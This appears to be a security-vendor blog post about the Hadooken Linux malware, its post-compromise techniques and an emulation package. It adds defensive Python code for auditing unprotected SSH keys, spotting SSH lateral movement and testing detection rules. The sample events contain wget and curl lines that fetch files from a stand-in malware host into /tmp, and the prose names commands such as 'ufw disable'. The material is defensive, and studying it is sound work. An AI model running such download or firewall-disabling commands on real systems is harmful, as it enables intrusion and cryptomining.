On September 12, 2024, AquaSec reported the identification of a new Linux-based malware during an intrusion chain that abused misconfigurations on public-facing Oracle Weblogic Servers.

Days later, on September 17, Sekoia’s Threat Detection & Research (TDR) team identified a similar intrusion chain in which two critical Remote Code Execution (RCE) vulnerabilities, CVE-2017-10271 and CVE-2020-14883, were exploited to gain initial access to the system.

Hadooken, also known as K4Spreader, is a Linux-based loader that includes an XMRig-based cryptominer known as PwnRig, designed to mine Monero via a private proxy mining pool, and the Tsunami malware, used to transform the system into a Distributed Denial of Service (DDoS) bot.

AttackIQ has released a new attack graph that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Hadooken to help customers validate their security controls and their ability to defend against this disruptive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against behaviors associated with the Hadooken malware.
  • Assess their security posture against an opportunistic adversary looking to consume computing resources.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on cryptomining activities.

Hadooken Malware – 2024-09 – Complete Infection Chain

Initial Access & Lateral Movement – Malware Deployment and Spreading

This stage begins with the execution of a base64-encoded payload, which downloads a malicious Python script via the Python Requests module. This Python script then attempts to download and save a sample of the Hadooken malware. On first run, a hidden file is created to mark that the script has run, preventing redundant execution. Finally, the root and user home directories are searched for private SSH keys. Any discovered keys are used for lateral movement into other systems, allowing the Hadooken malware to spread.

Deobfuscate/Decode Files or Information (T1140): This scenario uses the base64 utility to deobfuscate a base64 encoded payload. Please be aware that this step is configured with the exact base64 encoded string provided in multiple CTI reports which is responsible for the deployment of the Hadooken malware. This string was added to more closely emulate the IOCs presented in the reports. However, while the string is decoded during this scenario it is important to emphasize that it will not be executed and would be extremely risky to execute it manually.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate steps in order to test network and endpoint controls and their ability to prevent the delivery of known malicious content.

Hide Artifacts: Hidden Files and Directories (T1564.001): This scenario hides files in the filesystem through the execution of a batch script. Enabling the hidden attribute is an attempt to prevent malicious files from being detected by defenders.

Unsecured Credentials: Private Keys (T1552.004): This scenario uses the find utility to discover SSH private keys that may exist within the root or user home directories. SSH keys can provide opportunities for lateral movement and facilitate the spread of malware to other systems within an environment.

Remote Services: SSH (T1021.004): When configured, this scenario will emulate lateral movement to adjacent Linux systems over SSH.
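The T1552.004 and T1021.004 scenarios above turn on one condition: a private key sitting in a home directory that anyone who can read the file can use. The hardening check a defender wants here is an inventory of which keys are passphrase-protected and which are not. The following script is an added example written for this post, not AttackIQ scenario code and not part of the Hadooken tooling; it assumes a home-directory layout of `<home>/.ssh`, and the key files it scans are constructed header-only samples (OpenSSH format encodes the cipher name right after the `openssh-key-v1` magic, so an unencrypted key literally says `none`; legacy PEM keys signal encryption with a `Proc-Type: 4,ENCRYPTED` header).

```python
import base64
import struct
import tempfile
from pathlib import Path
from typing import Dict, Iterable, Optional

# --- Constructed sample key material for the demo (NOT real keys) ---------
# Only the headers the classifier inspects are meaningful; a real OpenSSH key
# carries the actual key data after the cipher/KDF fields.
def _sshstr(s: str) -> bytes:
    """Encode a string as the SSH wire type 'string' (uint32 length + bytes)."""
    b = s.encode()
    return struct.pack(">I", len(b)) + b

def _openssh_blob(cipher: str, kdf: str) -> str:
    raw = b"openssh-key-v1\x00" + _sshstr(cipher) + _sshstr(kdf)
    body = base64.b64encode(raw).decode()
    return (f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n"
            "-----END OPENSSH PRIVATE KEY-----\n")

SAMPLE_FILES = {
    "id_ed25519": _openssh_blob("none", "none"),          # no passphrase
    "id_rsa": _openssh_blob("aes256-ctr", "bcrypt"),      # passphrase-protected
    "legacy_rsa": ("-----BEGIN RSA PRIVATE KEY-----\n"    # PEM, encrypted
                   "Proc-Type: 4,ENCRYPTED\n"
                   "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
                   "AAAA\n-----END RSA PRIVATE KEY-----\n"),
    "authorized_keys": "ssh-ed25519 AAAA alice@host\n",   # not a private key
}

def classify_private_key(text: str) -> Optional[str]:
    """Return 'unprotected', 'encrypted', or None if the file is not a key."""
    if "PRIVATE KEY-----" not in text:
        return None
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        b64 = "".join(line for line in text.splitlines()
                      if not line.startswith("-----"))
        raw = base64.b64decode(b64)
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return None
        off = len(magic)
        (n,) = struct.unpack(">I", raw[off:off + 4])
        cipher = raw[off + 4:off + 4 + n].decode()
        return "unprotected" if cipher == "none" else "encrypted"
    # Legacy PEM keys signal encryption with a Proc-Type header.
    return "encrypted" if "Proc-Type: 4,ENCRYPTED" in text else "unprotected"

def audit_ssh_dirs(home_dirs: Iterable[Path]) -> Dict[str, str]:
    """Classify every private key under <home>/.ssh for each home directory."""
    findings: Dict[str, str] = {}
    for home in home_dirs:
        ssh_dir = Path(home) / ".ssh"
        if not ssh_dir.is_dir():
            continue
        for p in ssh_dir.iterdir():
            if not p.is_file():
                continue
            try:
                kind = classify_private_key(p.read_text(errors="ignore"))
            except (ValueError, struct.error):   # malformed base64 or header
                kind = None
            if kind:
                findings[str(p)] = kind
    return findings

def demo() -> Dict[str, str]:
    """Write the constructed samples into a throw-away home dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "alice"
        (home / ".ssh").mkdir(parents=True)
        for name, content in SAMPLE_FILES.items():
            (home / ".ssh" / name).write_text(content)
        return {Path(k).name: v for k, v in audit_ssh_dirs([home]).items()}

if __name__ == "__main__":
    for name, kind in sorted(demo().items()):
        print(f"{name:16} {kind}")
```

On a real host, pass `audit_ssh_dirs` the directories under `/home` plus `/root`; every `unprotected` finding is a key the Hadooken spreader could reuse as-is, and is the first candidate for a passphrase or for replacement with an agent-backed or hardware-backed key.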

Discovery & Defense Evasion – Hadooken Malware Deployment

This stage performs the deployment of the Hadooken malware and follow-up discovery and defense evasion activities. Once executed, Hadooken begins collecting system information such as the current user context, operating system type, and mounted filesystems. Lastly, Hadooken will attempt to evade defenses by disabling the Uncomplicated Firewall.

System Owner/User Discovery (T1033): During discovery and reconnaissance, threat actors often leverage native utilities to obtain information about a system's user accounts. This scenario uses the whoami command to determine the currently logged-on user.

System Information Discovery (T1082): This scenario obtains information pertaining to the Linux kernel version running on the system using the command uname -v.

System Information Discovery (T1082): This scenario uses the virtual file /proc/mounts to enumerate the currently mounted filesystems on the host, displaying their type (e.g., Ext4, XFS, Btrfs), mount point, and mount options.

Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario attempts to disable the Uncomplicated Firewall using the command ufw disable in order to impair system defenses and ensure network connectivity to both local and external malicious services.

Impact – Linux Cryptominer Execution

This stage focuses on the deployment of the packaged cryptomining component contained within Hadooken. Once on the system, this component is unpacked and executed. Cronjobs are created for various time intervals to ensure its persistence and execution.

Scheduled Task/Job: Cron (T1053.003): This scenario leverages the cron utility, a job scheduler native to Unix-like operating systems, to demonstrate how threat actors use scheduled command executions to ensure persistence.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

ProcessCommandLine contains ("curl" or "wget" or "lwp-download") and ProcessCommandLine contains "/tmp"

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Remote Services: SSH (T1021.004):

Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

2a. Detection

For Linux systems, the Audit framework (auditd) can be utilized to monitor the creation of SSH-related processes, such as ssh, and track any modifications to SSH log files, which store information about logged-in accounts. Additionally, monitoring for newly established network connections, particularly on port 22, can help detect potential SSH logins using valid accounts to access remote machines.
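Process and port monitoring tells you that an SSH session happened; the authentication log tells you who, from where, and with which key, which is what separates the deploy user's routine logins from a spreader reusing a stolen key across several hosts. The following script is an added example for this post (not AttackIQ scenario code) that parses sshd "Accepted" lines in syslog format and raises three kinds of alert: a (user, source) pair outside a learned baseline, any root login, and one key fingerprint accepted on more than one host in the window. The log lines and the baseline are constructed for the demo.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Matches sshd's "Accepted ..." line in a syslog-style auth.log; the trailing
# key type / fingerprint is only present for publickey logins.
SSHD_ACCEPT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
    r"(?:: (?P<keytype>\S+) (?P<fp>\S+))?$"
)

# Constructed sample lines (not from a real host), as if forwarded from
# several servers into one SIEM index.
SAMPLE_LOG = """\
Sep 17 10:01:02 web01 sshd[1234]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2: ED25519 SHA256:aaaa
Sep 17 10:05:44 web01 sshd[1301]: Accepted password for deploy from 10.0.0.5 port 51240 ssh2
Sep 17 11:12:09 db01 sshd[1402]: Accepted publickey for root from 10.0.0.23 port 40022 ssh2: RSA SHA256:zzzz
Sep 17 11:12:41 app02 sshd[2210]: Accepted publickey for root from 10.0.0.23 port 40031 ssh2: RSA SHA256:zzzz
Sep 17 11:13:00 web01 sshd[1410]: Failed password for invalid user admin from 203.0.113.9 port 22 ssh2
"""

# Known-good (user, source IP) pairs, e.g. learned from a month of history
# (constructed for the demo).
BASELINE: Set[Tuple[str, str]] = {("deploy", "10.0.0.5")}

def parse_logins(text: str) -> List[Dict[str, str]]:
    """Extract successful logins; lines that are not 'Accepted' are ignored."""
    return [m.groupdict() for m in map(SSHD_ACCEPT.match, text.splitlines()) if m]

def find_ssh_anomalies(text: str, baseline=BASELINE) -> List[Dict[str, str]]:
    """Return alerts, each a dict with a 'kind' and a human-readable 'detail'."""
    alerts: List[Dict[str, str]] = []
    seen_pairs: Set[Tuple[str, str]] = set()
    hosts_by_key = defaultdict(set)        # fingerprint -> destination hosts
    for ev in parse_logins(text):
        pair = (ev["user"], ev["src"])
        if pair not in baseline and pair not in seen_pairs:
            seen_pairs.add(pair)
            alerts.append({"kind": "new_pair",
                           "detail": f"{ev['user']} from {ev['src']} on {ev['host']}"})
        if ev["user"] == "root":
            alerts.append({"kind": "root_login",
                           "detail": f"root on {ev['host']} from {ev['src']}"})
        if ev["fp"]:
            hosts_by_key[ev["fp"]].add(ev["host"])
    # One key landing on several hosts in the window is the lateral-movement
    # shape of a key-reusing spreader.
    for fp, hosts in hosts_by_key.items():
        if len(hosts) > 1:
            alerts.append({"kind": "key_fanout",
                           "detail": f"{fp} accepted on {sorted(hosts)}"})
    return alerts

if __name__ == "__main__":
    for alert in find_ssh_anomalies(SAMPLE_LOG):
        print(f"[{alert['kind']}] {alert['detail']}")
```

The fan-out check only works when auth logs from all hosts land in one place, which is the practical argument for central log collection alongside the auditd rules mentioned above.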

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

3. Scheduled Task/Job: Cron (T1053.003)

Adversaries may abuse the Linux task scheduling utility, cron, to perform scheduled or recurring execution of malicious code for initial access or persistence. There are multiple ways to create or modify existing cronjobs on Linux systems. For example, cronjobs can be set system-wide by using the cron configuration directory /etc/cron.d or the preconfigured interval cron directories, such as /etc/cron.hourly. Similarly, users can define their own scheduled jobs using the crontab utility.

3a. Detection

With an EDR or SIEM Platform, you can detect the following commands being issued to schedule a malicious task.

FolderPath startswith ("/etc/cron.d/" or "/etc/cron.daily/" or "/etc/cron.hourly/" or "/etc/cron.weekly/" or "/etc/cron.monthly/" or "/var/spool/cron/crontabs/") or FolderPath contains ("/etc/cron.allow" or "/etc/cron.deny" or "/etc/crontab")
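The two signatures in sections 1a and 3a are written in SIEM query style, and the quickest way to see what they do and do not catch is to run them over a handful of events. The script below is an added example for this post (not AttackIQ code) that expresses both rules as Python predicates and evaluates them over constructed EDR-style process and file events. It departs from the 1a signature in one deliberate way: instead of a bare substring match on "curl", it tokenises the command line and compares the basename of each token, which still catches `sh -c "curl ..."` but not an unrelated program whose name happens to contain the string.

```python
import os
import re
from typing import Callable, Dict, List

DOWNLOADERS = {"curl", "wget", "lwp-download"}
CRON_DIRS = ("/etc/cron.d/", "/etc/cron.daily/", "/etc/cron.hourly/",
             "/etc/cron.weekly/", "/etc/cron.monthly/", "/var/spool/cron/crontabs/")
CRON_FILES = {"/etc/cron.allow", "/etc/cron.deny", "/etc/crontab"}

def rule_ingress_tool_transfer(event: Dict[str, object]) -> bool:
    """T1105: a native downloader invoked with a path under /tmp.
    Tokenising (rather than substring-matching "curl") avoids hits on
    unrelated binaries whose names contain it, and still catches the tool
    when it is wrapped in sh -c "..."."""
    cmd = str(event.get("ProcessCommandLine", ""))
    tokens = re.findall(r"[^\s\"']+", cmd)
    uses_downloader = any(os.path.basename(t) in DOWNLOADERS for t in tokens)
    return uses_downloader and "/tmp" in cmd

def rule_cron_persistence(event: Dict[str, object]) -> bool:
    """T1053.003: a file written into a cron directory or cron control file."""
    path = str(event.get("FolderPath", ""))
    return path.startswith(CRON_DIRS) or path in CRON_FILES

RULES: Dict[str, Callable[[Dict[str, object]], bool]] = {
    "T1105_ingress_tool_transfer": rule_ingress_tool_transfer,
    "T1053.003_cron_persistence": rule_cron_persistence,
}

# Constructed telemetry (not real data); hostnames use the reserved
# .example domain.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "Type": "ProcessCreated",
     "ProcessCommandLine": "/usr/bin/wget -q -O /tmp/x http://malware.example/x"},
    {"id": 2, "Type": "ProcessCreated",
     "ProcessCommandLine": 'sh -c "curl -fsSL http://malware.example/a -o /tmp/a"'},
    {"id": 3, "Type": "ProcessCreated",            # downloader, but no /tmp
     "ProcessCommandLine": "curl -s https://updates.example/ping"},
    {"id": 4, "Type": "FileCreated", "FolderPath": "/etc/cron.d/xmr"},
    {"id": 5, "Type": "FileCreated", "FolderPath": "/var/spool/cron/crontabs/root"},
    {"id": 6, "Type": "FileCreated", "FolderPath": "/etc/logrotate.d/nginx"},
    {"id": 7, "Type": "FileCreated", "FolderPath": "/etc/crontab"},
    {"id": 8, "Type": "ProcessCreated",            # "curly.py" is not curl
     "ProcessCommandLine": "python3 /opt/app/curly.py /tmp/out"},
]

def evaluate(events: List[Dict[str, object]]) -> Dict[str, List[int]]:
    """Run every rule over every event; return matching event ids per rule."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(int(ev["id"]))
    return hits

if __name__ == "__main__":
    for name, ids in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: events {ids}")
```

Event 3 shows the cost of the "/tmp" clause: a downloader fetching to somewhere other than /tmp is not flagged, so the signature is a high-confidence tripwire rather than full coverage of T1105; pairing it with the network-side control the text recommends covers the gap.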

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Scheduled Task/Job:

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by Hadooken operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.